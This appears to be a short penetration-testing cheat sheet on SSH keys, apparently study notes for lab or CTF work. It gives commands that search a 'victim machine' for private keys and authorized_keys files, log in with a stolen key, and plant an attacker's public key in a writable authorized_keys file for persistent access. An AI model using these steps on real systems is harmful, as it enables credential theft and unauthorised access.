SSH Keys
id_rsa, id_rsa.pub, authorized_keys
What is SSH Keypair?
When we generate a SSH key using ssh-keygen
, we are actually generating a RSA public/private key pair:
Public key:
id_rsa.pub
Private key:
id_rsa
SSH without password requires that your SSH public key id_rsa.pub
is included in authorized_keys
.
Enumeration
Search for SSH private key:
find / -name id_rsa 2>/dev/null
Search for authorized_keys
(authroized public keys so that no password needed when SSH):
find / -name authorized_keys 2>/dev/null
SSH without Password
Once we get a SSH private key from the victim machine, we can try SSH in without password. Note that the public key must be recorded in authorized_keys
.
Give appropriate permission to the private key:
chmod 600 id_rsa
SSH in:
ssh -i id_rsa <username>@<remote_ip>
~/.ssh/authozied_keys
If ~/.ssh/authozied_keys
is writable on the victim machine, we can generate a SSH keypair and add the generated public key to this file. This will allow us to SSH into the victim machine using the generated private key.
Generate a SSH keypair on the attack machine:
ssh-keygen -f mykey
Add mykey.pub
to ~/.ssh/authozied_keys
on the victim machine:
echo "<mykey.pub>" >> ~/.ssh/authorized_keys
Give appropriate permission to the private key:
chmod 600 mykey
SSH in:
ssh -i mykey <username>@<remote_ip>
Last updated
Was this helpful?